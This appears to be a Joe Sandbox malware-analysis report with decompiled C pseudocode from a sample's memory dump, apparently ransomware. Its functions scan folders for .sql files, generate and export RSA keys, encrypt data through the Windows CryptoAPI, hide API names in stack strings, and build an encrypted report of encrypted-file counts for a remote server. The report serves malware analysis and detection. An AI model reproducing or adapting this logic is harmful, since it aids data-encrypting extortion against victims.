Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Freelstrlen$BinaryCryptErrorHeapLastString$ByteCharExecuteExitFileModuleMultiNameProcessShellWide_memsetlstrcpywsprintf
String ID: #shasj$T@
API String ID: 463976167-3786297935
Opcode ID: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
Instruction ID: a9872d5510dab6a1258aa89b5c1af8b8eb6182ffb0005660de6a3b244a0720a6
Opcode Fuzzy Hash: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
Instruction Fuzzy Hash: 54519471E01215ABEB209BA59D49BAF7BB8EF48710F100065FA05BA2D1DB749D01CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004064A0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064A0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E00407C10(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E00406440(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
lstrcatW.KERNEL32(00000000,?), ref: 00406524
lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF
lstrlenA.KERNEL32(*******************,?,?), ref: 004065CE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004065E9
CloseHandle.KERNEL32(00000000,?,?), ref: 004065F3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0040661C
FindClose.KERNEL32(?,?,?), ref: 0040662D

Strings

.sql, xrefs: 00406554
*******************, xrefs: 004065B9, 004065C9

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
Instruction ID: d8231c9366fa09183c7f9a28845eb84a492a5b8a9a6307543842452b5fb504c9
Opcode Fuzzy Hash: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
Instruction Fuzzy Hash: 24419271601219ABEB209B609D48FAB77BCEF44704F11447AF902F6191EB799E50CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00405540 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00405540(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E004039B0( &_v180);
				E00406D90( &_v180);
				E00406BA0( &_v180);
				E004069A0( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0x410128]");
				_v28 = _t79;
				_t80 =  *0x410134; // 0x6a73
				_v24 = _t80;
				_t81 =  *0x410136; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E00408B30( &_v435, 0, 0xff);
				E00405C40( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E00405CF0( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E00405370(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E00407720( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0040555F
wsprintfW.USER32 ref: 0040558D
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055DC
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055EE
_memset.LIBCMT ref: 00405631
lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0040563D
CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 00405682
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0040568C
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00405699
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 004056A8
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056B2
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056CF
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056E8
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405720
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405737

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 00405587
#shasj, xrefs: 004055F0

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
API String ID: 2994799111-4131875188
Opcode ID: 211b1dd28046743099e46c1b0964984f10231aaafabe4b274e23aab69b3c652f
Instruction ID: 65ff7d96991e722c176764c3897e6b24fa244fe7beac740f882282c65e832afb
Opcode Fuzzy Hash: 211b1dd28046743099e46c1b0964984f10231aaafabe4b274e23aab69b3c652f
Instruction Fuzzy Hash: B4519F71A00219AAEB20AB65DD46FEF7B79EF44704F100079E605B62D1DB746E04CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406000 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00406000(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, char _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0x412ae8);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						_t12 =  &_v28; // 0x403724
						__imp__CryptGetKeyParam(_v12, 8, _t12, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t16 =  &_a20; // 0x403724
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16,  *_t16);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E004034F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0x412ae8);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00406023, 00406049
$7@, xrefs: 004060BC, 004060BF
$7@, xrefs: 004060A0, 004060A3

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: $7@$$7@$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-2376705498
Opcode ID: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
Instruction ID: f2ae4c90db2c5b8a25dd032e9c4ad046e7fd1e3aad681ca681e37570fcd3149a
Opcode Fuzzy Hash: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
Instruction Fuzzy Hash: 84314F74A40308BFDB10CFA0DD45FAF77B8AB48700F108029F602BA2D0D7B99A50DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00407C60 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00407C60(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						goto L15;
					}
				}
			}

0x00407c70
0x00407c72
0x00407c77
0x00407c7a
0x00407c7d
0x00407c85
0x00407d79
0x00407d81
0x00407c8b
0x00407c8b
0x00407c90
0x00407c90
0x00407c93
0x00407c98
0x00407c99
0x00407ca5
0x00407ca5
0x00407cb1
0x00407cb5
0x00407d87
0x00407d95
0x00407da3
0x00407cc3
0x00407cc6
0x00407cce
0x00407cd5
0x00407cdc
0x00407ce2
0x00407ce6
0x00407ced
0x00407cf4
0x00407cfb
0x00407cff
0x00407d07
0x00407d17
0x00407d17
0x00407d1c
0x00407d24
0x00000000
0x00407d26
0x00407d26
0x00407d27
0x00407d28
0x00407d2f
0x00000000
0x00407d31
0x00407d31
0x00407d35
0x00407d37
0x00407d3a
0x00407d41
0x00407d45
0x00407d4e
0x00407d52
0x00407d53
0x00407d41
0x00407d57
0x00407d57
0x00407d2f
0x00407d09
0x00407d09
0x00407d0d
0x00407d15
0x00407d5e
0x00407d5e
0x00000000
0x00000000
0x00000000
0x00407d15
0x00407d65
0x00407d73
0x00000000
0x00407d73
0x00407cb5

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
GetModuleHandleA.KERNEL32(?), ref: 00407CFF
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D87
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D95

Strings

Advapi32.dll, xrefs: 00407D09, 00407D0C
CryptGenRandomAdvapi32.dll, xrefs: 00407D17, 00407D1A

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
Instruction ID: 199b4cbb89f92d6933ab86ad2097cfc69592b150d2405189e4f4276a6cc67689
Opcode Fuzzy Hash: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
Instruction Fuzzy Hash: 8931F871E04209ABEB109FE4DD49BEEBB78EF44700F204079E505B62A1E775AE01CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00407DB0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407DB0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

0x00407dc0
0x00407dc2
0x00407dc7
0x00407dcd
0x00407dd0
0x00407dd8
0x00407ea2
0x00407eaa
0x00407dde
0x00407dde
0x00407de0
0x00407de0
0x00407de3
0x00407de7
0x00407de8
0x00407df4
0x00407dfe
0x00407e02
0x00407eb0
0x00407ebe
0x00407ecc
0x00407e11
0x00407e14
0x00407e1c
0x00407e23
0x00407e2a
0x00407e30
0x00407e34
0x00407e3b
0x00407e42
0x00407e49
0x00407e4d
0x00407e55
0x00407e65
0x00407e65
0x00407e6a
0x00407e72
0x00407e7d
0x00407e86
0x00407e86
0x00407e57
0x00407e57
0x00407e5b
0x00407e63
0x00000000
0x00000000
0x00407e63
0x00407e8e
0x00407e9c
0x00000000
0x00407e9c
0x00407e02

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
GetModuleHandleA.KERNEL32(?), ref: 00407E4D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407E9C
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE

Strings

CryptGenRandomAdvapi32.dll, xrefs: 00407E65, 00407E68
Advapi32.dll, xrefs: 00407E57, 00407E5A

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
Instruction ID: be5cfa20fe97609e74d06931db444e7d7e20eeaeedb8336480d1c404223e93be
Opcode Fuzzy Hash: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
Instruction Fuzzy Hash: FA318471E05209AFEB109FA5DD49BEEBB78EF44701F104079E605B6291D774AE00CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405D80 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00405D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00404916,?,0040491E), ref: 00405D95
GetLastError.KERNEL32(?,0040491E), ref: 00405D9F
CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0040491E), ref: 00405DBB
CryptGenKey.ADVAPI32(0040491E,0000A400,08000001,?,?,0040491E), ref: 00405DE7
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 00405E0B
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 00405E23
CryptDestroyKey.ADVAPI32(?), ref: 00405E2D
CryptReleaseContext.ADVAPI32(0040491E,00000000), ref: 00405E39
